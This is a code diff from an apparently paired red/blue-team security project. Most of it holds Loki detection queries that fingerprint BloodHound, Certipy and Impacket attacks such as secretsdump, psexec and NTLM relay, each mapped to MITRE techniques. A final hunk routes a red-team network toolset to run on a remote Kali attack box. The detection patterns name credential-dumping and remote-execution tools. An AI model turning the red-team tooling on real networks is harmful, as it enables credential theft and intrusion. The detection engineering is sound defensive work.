+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with cert auth indicators.
+ """
+ dn.log_metric("query_template_cert_auth", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # PKINIT authentication, certificate-based Kerberos
+ # Event 4768 with certificate auth
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(pkinit|pkca|smartcard|certificate.*auth)"'
+ ' |~ "(?i)(4768|tgt.*request|kerberos|certipy.*auth)"'
+ )
+
+ logger.info(f"Certificate authentication detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "certificate_authentication"
+ result["_mitre_technique"] = "T1649"
+ result["_red_team_tool"] = "certipy_auth"
+
+ return result
+
+ # =========================================================================
+ # BLOODHOUND SPECIFIC LDAP QUERY SIGNATURES
+ # Maps to: run_bloodhound
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_domain_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound domain trust and forest enumeration.
+
+ BloodHound queries for cross-domain trust relationships and forest
+ topology to map potential attack paths.
+
+ MITRE ATT&CK: T1482 (Domain Trust Discovery)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with domain enum indicators.
+ """
+ dn.log_metric("query_template_bh_domain", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # BloodHound domain enumeration LDAP queries:
+ # - trusteddomain objectclass queries
+ # - crossRef objects for forest structure
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"'
+ ' |~ "(?i)(trusteddomain|crossref|trusttype|trustdirection|trustattributes)"'
+ )
+
+ logger.info(f"BloodHound domain enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_domain_enum"
+ result["_mitre_technique"] = "T1482"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_acl_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound ACL/DACL enumeration.
+
+ BloodHound's ACL collection queries for nTSecurityDescriptor on AD
+ objects to find privilege escalation paths via ACL abuse.
+
+ MITRE ATT&CK: T1069.002 (Permission Groups Discovery: Domain Groups)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with ACL enumeration indicators.
+ """
+ dn.log_metric("query_template_bh_acl", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # BloodHound ACL collection LDAP patterns:
+ # - nTSecurityDescriptor attribute requests
+ # - Large LDAP queries for DACL
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"'
+ ' |~ "(?i)(ntsecuritydescriptor|dacl|securitydescriptor|allowedtoactonbehalf)"'
+ )
+
+ logger.info(f"BloodHound ACL enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_acl_enum"
+ result["_mitre_technique"] = "T1069.002"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_session_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound session enumeration.
+
+ BloodHound enumerates active user sessions on computers using
+ NetSessionEnum and NetWkstaUserEnum APIs to map where users are logged in.
+
+ MITRE ATT&CK: T1033 (System Owner/User Discovery)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with session enum indicators.
+ """
+ dn.log_metric("query_template_bh_session", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Session enumeration APIs:
+ # - NetSessionEnum (srvsvc)
+ # - NetWkstaUserEnum (wkssvc)
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(srvsvc|wkssvc|netsession|netwksta)"'
+ ' |~ "(?i)(enum|bloodhound|sharphound|session.*collection)"'
+ )
+
+ logger.info(f"BloodHound session enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_session_enum"
+ result["_mitre_technique"] = "T1033"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_gpo_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound GPO enumeration.
+
+ BloodHound enumerates Group Policy Objects to find GPO-based attack
+ paths and privilege escalation opportunities.
+
+ MITRE ATT&CK: T1615 (Group Policy Discovery)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with GPO enum indicators.
+ """
+ dn.log_metric("query_template_bh_gpo", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # GPO enumeration queries:
+ # - groupPolicyContainer objectclass
+ # - gPLink, gPCFileSysPath attributes
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"'
+ ' |~ "(?i)(grouppolicycontainer|gplink|gpcfilesyspath|gpo)"'
+ )
+
+ logger.info(f"BloodHound GPO enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_gpo_enum"
+ result["_mitre_technique"] = "T1615"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_computer_enum(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound computer enumeration.
+
+ BloodHound queries for computer objects with specific attributes
+ to identify targets for lateral movement.
+
+ MITRE ATT&CK: T1018 (Remote System Discovery)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with computer enum indicators.
+ """
+ dn.log_metric("query_template_bh_computer", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Computer enumeration with BloodHound-specific attributes:
+ # - operatingsystem, operatingsystemversion
+ # - serviceprincipalname, msds-allowedtodelegateto
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ldap|389|636|bloodhound|sharphound)"'
+ ' |~ "(?i)(objectclass=computer|operatingsystem|serviceprincipalname|allowedtodelegateto)"'
+ )
+
+ logger.info(f"BloodHound computer enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_computer_enum"
+ result["_mitre_technique"] = "T1018"
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ # =========================================================================
+ # IMPACKET TOOL FINGERPRINTS
+ # Maps to: secretsdump, smbclient, wmiexec, psexec, atexec, dcomexec
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_wmiexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-wmiexec remote execution.
+
+ Wmiexec uses WMI for semi-interactive shell, creating processes via
+ Win32_Process.Create. Output retrieved via SMB temp files.
+
+ MITRE ATT&CK: T1047 (Windows Management Instrumentation)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with wmiexec indicators.
+ """
+ dn.log_metric("query_template_wmiexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Wmiexec patterns:
+ # - WMI process creation events
+ # - cmd.exe /Q /c with output redirection to ADMIN$
+ # - __InstanceCreationEvent subscription
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(wmi|win32_process|root\\\\cimv2)"'
+ ' |~ "(?i)(wmiexec|impacket|cmd.*\\/q.*\\/c|127\\.0\\.0\\.1.*admin\\$)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Wmiexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_wmiexec"
+ result["_mitre_technique"] = "T1047"
+ result["_red_team_tool"] = "wmiexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_psexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-psexec remote execution.
+
+ Psexec uploads a service executable to ADMIN$ share, creates and starts
+ a service, then communicates via named pipe. Creates distinctive events.
+
+ MITRE ATT&CK: T1569.002 (Service Execution)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with psexec indicators.
+ """
+ dn.log_metric("query_template_psexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Psexec patterns:
+ # - Event 7045: Service installed (random 8-char name)
+ # - Service binary in ADMIN$ or C:\Windows
+ # - RemComSvc or similar service names
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(7045|service.*install|psexec|remcom)"'
+ ' |~ "(?i)(admin\\$|\\\\\\\\.*\\\\admin|service.*creat|cmd\\.exe)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Psexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_psexec"
+ result["_mitre_technique"] = "T1569.002"
+ result["_red_team_tool"] = "psexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_smbexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-smbexec remote execution.
+
+ Smbexec creates a service that executes commands via cmd.exe with
+ output redirected to a share file. More stealthy than psexec.
+
+ MITRE ATT&CK: T1569.002 (Service Execution)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with smbexec indicators.
+ """
+ dn.log_metric("query_template_smbexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Smbexec patterns:
+ # - Service with cmd.exe /Q /c echo command
+ # - BTOBTO service name pattern (default)
+ # - Output to C:\__output or __output
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(7045|service|smbexec)"'
+ ' |~ "(?i)(btobto|cmd.*echo.*\\^>|__output|execute\\.bat)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Smbexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_smbexec"
+ result["_mitre_technique"] = "T1569.002"
+ result["_red_team_tool"] = "smbexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_atexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-atexec remote execution.
+
+ Atexec uses the Task Scheduler (ATSVC) to create scheduled tasks
+ for command execution. Creates Event 4698 (scheduled task created).
+
+ MITRE ATT&CK: T1053.002 (Scheduled Task)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with atexec indicators.
+ """
+ dn.log_metric("query_template_atexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Atexec patterns:
+ # - Event 4698: Scheduled task created
+ # - Task name pattern (random characters)
+ # - cmd.exe /C execution in task
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4698|4699|4700|4701|schtask|taskscheduler|atsvc)"'
+ ' |~ "(?i)(atexec|impacket|cmd.*\\/c|schtasks)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Atexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_atexec"
+ result["_mitre_technique"] = "T1053.002"
+ result["_red_team_tool"] = "atexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_dcomexec(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-dcomexec remote execution.
+
+ Dcomexec uses DCOM objects (MMC20.Application, ShellWindows, ShellBrowserWindow)
+ to execute commands remotely. Operates over TCP 135 (RPC).
+
+ MITRE ATT&CK: T1021.003 (DCOM)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with dcomexec indicators.
+ """
+ dn.log_metric("query_template_dcomexec", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Dcomexec patterns:
+ # - DCOM/RPC connections
+ # - MMC20.Application, ShellWindows, ShellBrowserWindow instantiation
+ # - Process created by mmc.exe or explorer.exe
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(dcom|135/tcp|rpc|mmc20|shellwindows|shellbrowser)"'
+ ' |~ "(?i)(dcomexec|impacket|executeshellcommand|document\\.application)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Dcomexec detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_dcomexec"
+ result["_mitre_technique"] = "T1021.003"
+ result["_red_team_tool"] = "dcomexec"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_secretsdump_sam(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-secretsdump SAM database dump.
+
+ Secretsdump can dump local SAM database by accessing registry hives
+ remotely via SMB. Retrieves local account hashes.
+
+ MITRE ATT&CK: T1003.002 (SAM)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with SAM dump indicators.
+ """
+ dn.log_metric("query_template_secretsdump_sam", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # SAM dump patterns:
+ # - Remote registry access to SAM, SYSTEM, SECURITY hives
+ # - Event 4663: Object access on registry
+ # - reg save commands
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(registry|hklm|winreg|samr)"'
+ ' |~ "(?i)(sam|system|security|secretsdump|reg.*save)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"SAM dump detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_secretsdump_sam"
+ result["_mitre_technique"] = "T1003.002"
+ result["_red_team_tool"] = "secretsdump"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_secretsdump_lsa(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-secretsdump LSA secrets dump.
+
+ Secretsdump extracts LSA secrets which may contain service account
+ passwords, autologon credentials, and other sensitive data.
+
+ MITRE ATT&CK: T1003.004 (LSA Secrets)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with LSA dump indicators.
+ """
+ dn.log_metric("query_template_secretsdump_lsa", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # LSA secrets dump patterns:
+ # - SECURITY hive access
+ # - LSA policy queries
+ # - $MACHINE.ACC, DefaultPassword, NL$KM patterns
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(lsa|security|policy|secrets)"'
+ ' |~ "(?i)(\\$machine|defaultpassword|nl\\$|dpapi|secretsdump)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"LSA secrets dump detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_secretsdump_lsa"
+ result["_mitre_technique"] = "T1003.004"
+ result["_red_team_tool"] = "secretsdump"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_ntlmrelayx(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-ntlmrelayx NTLM relay attacks.
+
+ Ntlmrelayx intercepts NTLM authentication and relays it to target
+ services like SMB, LDAP, HTTP for unauthorized access.
+
+ MITRE ATT&CK: T1557.001 (LLMNR/NBT-NS Poisoning and SMB Relay)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with NTLM relay indicators.
+ """
+ dn.log_metric("query_template_ntlmrelayx", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # NTLM relay patterns:
+ # - Authentication from unexpected source IP
+ # - Rapid auth attempts with same NTLM challenge
+ # - SMB signing not required warnings
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(ntlm|relay|responder|inveigh)"'
+ ' |~ "(?i)(ntlmrelayx|smbrelay|signing.*not.*required|coerce)"'
+ )
+
+ logger.info(f"NTLM relay detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_ntlmrelayx"
+ result["_mitre_technique"] = "T1557.001"
+ result["_red_team_tool"] = "ntlmrelayx"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_impacket_smbclient(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect impacket-smbclient share access.
+
+ Smbclient provides interactive SMB access for enumeration and
+ file operations on remote shares.
+
+ MITRE ATT&CK: T1021.002 (SMB/Windows Admin Shares)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with smbclient indicators.
+ """
+ dn.log_metric("query_template_smbclient", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Smbclient patterns:
+ # - Interactive SMB session characteristics
+ # - Multiple share enumeration
+ # - File browsing patterns
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(smb|445/tcp|cifs|smbclient)"'
+ ' |~ "(?i)(impacket|tree.*connect|shares.*enum|file.*access)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Smbclient detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "impacket_smbclient"
+ result["_mitre_technique"] = "T1021.002"
+ result["_red_team_tool"] = "smbclient"
+
+ return result
+
+ # =========================================================================
+ # HOST/USER INVESTIGATION HELPERS
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def get_host_activity(
+ self,
+ hostname: str,
+ hours_back: int = 24,
+ attack_patterns_only: bool = False,
+ ) -> dict[str, Any]:
+ """Get all activity for a specific host.
+
+ Comprehensive query to gather logs for a host during investigation.
+ Can optionally filter to only show attack-related patterns.
+
+ Args:
+ hostname: Hostname to investigate.
+ hours_back: Hours of logs to search.
+ attack_patterns_only: If True, filter for attack patterns only.
+
+ Returns:
+ All log activity for the specified host.
+ """
+ dn.log_metric("query_template_host_activity", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ if attack_patterns_only:
+ logql = (
+ f'{{hostname=~".*{hostname}.*"}} |~ "(?i)(4625|4624|4662|4769|4768|5140|7045|4688)"'
+ )
+ else:
+ logql = f'{{hostname=~".*{hostname}.*"}}'
+
+ logger.info(f"Host activity query: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=1000)
+ result["_query_template"] = "host_activity"
+ result["_target_host"] = hostname
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def get_user_activity(
+ self,
+ username: str,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Get all activity for a specific user.
+
+ Comprehensive query to gather all logs mentioning a user account.
+
+ Args:
+ username: Username to investigate.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ All log activity mentioning the specified user.
+ """
+ dn.log_metric("query_template_user_activity", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ logql = f'{{job=~".+"}} |~ "(?i){username}"'
+
+ logger.info(f"User activity query: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=1000)
+ result["_query_template"] = "user_activity"
+ result["_target_user"] = username
+
+ return result
+
+ # =========================================================================
+ # TEMPLATE LISTING
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ def list_query_templates(self) -> list[dict[str, Any]]:
+ """List all available query templates with MITRE mappings.
+
+ Returns:
+ List of templates organized by attack phase, with red team tool correlation.
+ """
+ return [
+ # Reconnaissance
+ {
+ "name": "detect_port_scanning",
+ "description": "Detect nmap/masscan port scanning",
+ "mitre": "T1046",
+ "tactic": "discovery",
+ "red_team_tool": "nmap_scan",
+ },
+ {
+ "name": "detect_user_enumeration",
+ "description": "Detect AD user account enumeration",
+ "mitre": "T1087.002",
+ "tactic": "discovery",
+ "red_team_tool": "enumerate_users",
+ },
+ {
+ "name": "detect_share_enumeration",
+ "description": "Detect SMB share discovery",
+ "mitre": "T1135",
+ "tactic": "discovery",
+ "red_team_tool": "enumerate_shares",
+ },
+ # Credential Access
+ {
+ "name": "detect_secretsdump",
+ "description": "Detect credential dumping via secretsdump",
+ "mitre": "T1003",
+ "tactic": "credential_access",
+ "red_team_tool": "secretsdump",
+ },
+ {
+ "name": "detect_dcsync",
+ "description": "Detect DCSync attack against domain controller",
+ "mitre": "T1003.006",
+ "tactic": "credential_access",
+ "red_team_tool": "secretsdump",
+ "severity": "critical",
+ },
+ {
+ "name": "detect_kerberoasting",
+ "description": "Detect Kerberoasting TGS ticket requests",
+ "mitre": "T1558.003",
+ "tactic": "credential_access",
+ "red_team_tool": "kerberoast",
+ },
+ {
+ "name": "detect_asrep_roasting",
+ "description": "Detect AS-REP roasting attacks",
+ "mitre": "T1558.004",
+ "tactic": "credential_access",
+ "red_team_tool": "asrep_roast",
+ },
+ {
+ "name": "detect_brute_force",
+ "description": "Detect brute force/password spray attempts",
+ "mitre": "T1110",
+ "tactic": "credential_access",
+ "red_team_tool": None,
+ },
+ # Lateral Movement
+ {
+ "name": "detect_pass_the_hash",
+ "description": "Detect Pass-the-Hash NTLM attacks",
+ "mitre": "T1550.002",
+ "tactic": "lateral_movement",
+ "red_team_tool": "domain_admin_checker",
+ },
+ {
+ "name": "detect_lateral_movement",
+ "description": "Detect PSExec, WMI, WinRM lateral movement",
+ "mitre": "T1021",
+ "tactic": "lateral_movement",
+ "red_team_tool": None,
+ },
+ {
+ "name": "detect_smb_file_access",
+ "description": "Detect suspicious file access on shares",
+ "mitre": "T1039",
+ "tactic": "collection",
+ "red_team_tool": "download_file_content",
+ },
+ # Privilege Escalation
+ {
+ "name": "detect_adcs_exploitation",
+ "description": "Detect ADCS certificate abuse (ESC1-15)",
+ "mitre": "T1649",
+ "tactic": "privilege_escalation",
+ "red_team_tool": "certipy_*",
+ "severity": "high",
+ },
+ {
+ "name": "detect_delegation_abuse",
+ "description": "Detect RBCD/delegation privilege escalation",
+ "mitre": "T1134.001",
+ "tactic": "privilege_escalation",
+ "red_team_tool": "rbcd_write",
+ },
+ {
+ "name": "detect_bloodhound_collection",
+ "description": "Detect BloodHound AD enumeration",
+ "mitre": "T1087",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ # Persistence
+ {
+ "name": "detect_golden_ticket",
+ "description": "Detect Golden Ticket creation/usage",
+ "mitre": "T1558.001",
+ "tactic": "persistence",
+ "red_team_tool": "generate_golden_ticket",
+ "severity": "critical",
+ },
+ # Execution
+ {
+ "name": "detect_suspicious_execution",
+ "description": "Detect encoded PowerShell, LOLBins",
+ "mitre": "T1059",
+ "tactic": "execution",
+ "red_team_tool": None,
+ },
+ # ADCS/Certipy Specific (ESC attacks)
+ {
+ "name": "detect_certipy_enumeration",
+ "description": "Detect Certipy certificate template enumeration",
+ "mitre": "T1649",
+ "tactic": "discovery",
+ "red_team_tool": "certipy_find",
+ },
+ {
+ "name": "detect_esc1_attack",
+ "description": "Detect ESC1 - Enrollee Supplies Subject attack",
+ "mitre": "T1649",
+ "tactic": "privilege_escalation",
+ "red_team_tool": "certipy_req_esc1",
+ "severity": "critical",
+ },
+ {
+ "name": "detect_esc4_attack",
+ "description": "Detect ESC4 - Certificate template ACL modification",
+ "mitre": "T1649",
+ "tactic": "privilege_escalation",
+ "severity": "high",
+ },
+ {
+ "name": "detect_esc8_attack",
+ "description": "Detect ESC8 - NTLM relay to AD CS HTTP endpoints",
+ "mitre": "T1649",
+ "tactic": "privilege_escalation",
+ "severity": "critical",
+ },
+ {
+ "name": "detect_certificate_authentication",
+ "description": "Detect authentication using stolen/forged certificates",
+ "mitre": "T1649",
+ "tactic": "credential_access",
+ "red_team_tool": "certipy_auth",
+ },
+ # BloodHound Specific LDAP Queries
+ {
+ "name": "detect_bloodhound_domain_enum",
+ "description": "Detect BloodHound domain trust enumeration",
+ "mitre": "T1482",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ {
+ "name": "detect_bloodhound_acl_enum",
+ "description": "Detect BloodHound ACL/DACL collection",
+ "mitre": "T1069.002",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ {
+ "name": "detect_bloodhound_session_enum",
+ "description": "Detect BloodHound session enumeration (NetSessionEnum)",
+ "mitre": "T1033",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ {
+ "name": "detect_bloodhound_gpo_enum",
+ "description": "Detect BloodHound GPO enumeration",
+ "mitre": "T1615",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ {
+ "name": "detect_bloodhound_computer_enum",
+ "description": "Detect BloodHound computer object enumeration",
+ "mitre": "T1018",
+ "tactic": "discovery",
+ "red_team_tool": "run_bloodhound",
+ },
+ # Impacket Tool Fingerprints
+ {
+ "name": "detect_impacket_wmiexec",
+ "description": "Detect impacket-wmiexec WMI remote execution",
+ "mitre": "T1047",
+ "tactic": "execution",
+ "red_team_tool": "wmiexec",
+ },
+ {
+ "name": "detect_impacket_psexec",
+ "description": "Detect impacket-psexec service-based execution",
+ "mitre": "T1569.002",
+ "tactic": "execution",
+ "red_team_tool": "psexec",
+ },
+ {
+ "name": "detect_impacket_smbexec",
+ "description": "Detect impacket-smbexec stealthy service execution",
+ "mitre": "T1569.002",
+ "tactic": "execution",
+ "red_team_tool": "smbexec",
+ },
+ {
+ "name": "detect_impacket_atexec",
+ "description": "Detect impacket-atexec scheduled task execution",
+ "mitre": "T1053.002",
+ "tactic": "execution",
+ "red_team_tool": "atexec",
+ },
+ {
+ "name": "detect_impacket_dcomexec",
+ "description": "Detect impacket-dcomexec DCOM remote execution",
+ "mitre": "T1021.003",
+ "tactic": "lateral_movement",
+ "red_team_tool": "dcomexec",
+ },
+ {
+ "name": "detect_impacket_secretsdump_sam",
+ "description": "Detect secretsdump SAM database extraction",
+ "mitre": "T1003.002",
+ "tactic": "credential_access",
+ "red_team_tool": "secretsdump",
+ },
+ {
+ "name": "detect_impacket_secretsdump_lsa",
+ "description": "Detect secretsdump LSA secrets extraction",
+ "mitre": "T1003.004",
+ "tactic": "credential_access",
+ "red_team_tool": "secretsdump",
+ },
+ {
+ "name": "detect_impacket_ntlmrelayx",
+ "description": "Detect NTLM relay attacks (ntlmrelayx)",
+ "mitre": "T1557.001",
+ "tactic": "credential_access",
+ "red_team_tool": "ntlmrelayx",
+ },
+ {
+ "name": "detect_impacket_smbclient",
+ "description": "Detect impacket-smbclient share access",
+ "mitre": "T1021.002",
+ "tactic": "lateral_movement",
+ "red_team_tool": "smbclient",
+ },
+ # Investigation Helpers
+ {
+ "name": "get_host_activity",
+ "description": "Get all activity for a specific host",
+ "mitre": None,
+ "tactic": "investigation",
+ "red_team_tool": None,
+ },
+ {
+ "name": "get_user_activity",
+ "description": "Get all activity for a specific user",
+ "mitre": None,
+ "tactic": "investigation",
+ "red_team_tool": None,
+ },
+ ]
diff --git a/src/ares/tools/red/network.py b/src/ares/tools/red/network.py
index af318b19..a81c8f4a 100644
--- a/src/ares/tools/red/network.py
+++ b/src/ares/tools/red/network.py
@@ -2,12 +2,11 @@
This module provides toolsets for network enumeration, credential harvesting,
password cracking, share pilfering, and golden ticket generation.
+
+All tools execute commands remotely on the Kali attack box via AWS SSM.
"""
import logging
-import os
-import subprocess
-import tempfile
import time
from datetime import datetime, timezone
from typing import Any
@@ -24,10 +23,25 @@
TimelineEvent,
User,
)
+from ares.core.remote import run_remote
logger = logging.getLogger(__name__)
+def _run_tool(cmd: list[str], timeout_seconds: int = 300) -> tuple[str, str, int]:
+ """Execute a command on the remote Kali attack box.
+
+ Args:
+ cmd: Command as list of arguments
+ timeout_seconds: Maximum execution time
+
+ Returns:
+ Tuple of (stdout, stderr, return_code)
+ """
+ result = run_remote(cmd, timeout_seconds=timeout_seconds)
+ return result.stdout, result.stderr, result.return_code
+
+
class NetworkEnumerationTools(Toolset):
"""Tools for network scanning and enumeration."""
@@ -58,15 +72,15 @@ def nmap_scan(self, target: str) -> str:
>>> result = nmap_scan("192.168.1.2")
